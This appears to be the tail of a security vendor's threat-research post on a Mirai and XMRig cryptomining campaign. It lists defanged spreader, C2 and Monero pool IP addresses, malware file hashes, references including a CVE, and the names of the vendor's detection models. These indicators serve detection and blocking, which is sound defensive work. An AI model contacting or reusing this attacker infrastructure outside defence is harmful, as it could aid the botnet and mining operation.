Spreader IP - 95[.]214.52.170

C2 IP - 89[.]144.31.18

Mirai hash - 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb

Xmrig hash - aa6e0f4939135feed4c771e4e4e9c22b6cedceb437628c70a85aeb6f1fe728fa

Config hash - 318320a09de5778af0bf3e4853d270fd2d390e176822dec51e0545e038232666

Monero pool 1 - 37[.]114.37.94

Monero pool 2 - 37[.]114.37.82

References  

[1] https://nvd.nist.gov/vuln/detail/CVE-2025-55182

[2] https://myprepaid-server.com/

[3] https://krebsonsecurity.com/2025/02/notorious-malware-spam-host-prospero-moves-to-kaspersky-lab

Darktrace Model Coverage

Anomalous Connection::Application Protocol on Uncommon Port

Anomalous Connection::New User Agent to IP Without Hostname

Anomalous Connection::Posting HTTP to IP Without Hostname

Anomalous File::Script and EXE from Rare External

Anomalous File::Script from Rare External Location

Anomalous Server Activity::New User Agent from Internet Facing System

Anomalous Server Activity::Rare External from Server

Antigena::Network::External Threat::Antigena Suspicious File Block

Antigena::Network::External Threat::Antigena Watched Domain Block

Compromise::Beacon for 4 Days

Compromise::Beacon to Young Endpoint

Compromise::Beaconing Activity To External Rare

Compromise::High Volume of Connections with Beacon Score

Compromise::HTTP Beaconing to New IP

Compromise::HTTP Beaconing to Rare Destination

Compromise::Large Number of Suspicious Failed Connections

Compromise::Slow Beaconing Activity To External Rare

Compromise::Sustained SSL or HTTP Increase

Device::New User Agent

Device::Threat Indicator

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer
あなたのデータ × DarktraceのAI
唯一無二のDarktrace AIで、ネットワークセキュリティを次の次元へ